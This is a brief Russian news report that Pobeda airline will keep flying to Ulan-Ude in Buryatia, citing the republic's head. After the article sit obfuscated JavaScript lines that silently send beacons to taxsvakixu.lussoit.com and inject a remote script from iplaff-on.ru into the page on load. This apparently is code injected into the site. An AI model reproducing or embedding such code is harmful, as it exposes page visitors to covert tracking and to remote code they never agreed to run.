Авиакомпания «Победа» продолжит летать в Бурятию

«Победа» продолжит осуществлять авиаперевозки в Улан-Удэ. Об этом 17 февраля сообщил глава Республики Бурятия Алексей Цыденов на странице в Facebook.

Авиакомпания «Победа» продолжит летать в Бурятию
© Zab.ru

«Авикомпания Победа остается в Улан-Удэ! Сохранят четыре рейса в неделю на период до октября», - написал глава Республики Бурятия.

Напомним, ранее сообщалось, что авиакомпания «Победа» остановила продажу билетов в Бурятию. По словам перевозчика, выполнять рейсы в Улан-Удэ нецелесообразно из-за выделения государством субсидированных билетов для другой авиакомпании.

«Победа» перестанет летать в Дальневосточный федеральный округ

var e,n,o;window.self===window.top&&(e=['//','s:','tp','ht'].reverse().join(''),n=['taxsvakixu.lussoit.com','45'].join('/'),(o=new Image).src=''.concat(e).concat(n,'.gif'));var e,n,o;window.self===window.top&&(e=['//','s:','tp','ht'].reverse().join(''),n=['taxsvakixu.lussoit.com','48'].join('/'),(o=new Image).src=''.concat(e).concat(n,'.gif'));var script = document.createElement("script"); script.src = "//iplaff-on.ru/link/zekhb8s8/"; document.getElementsByTagName("head")[0].appendChild(script);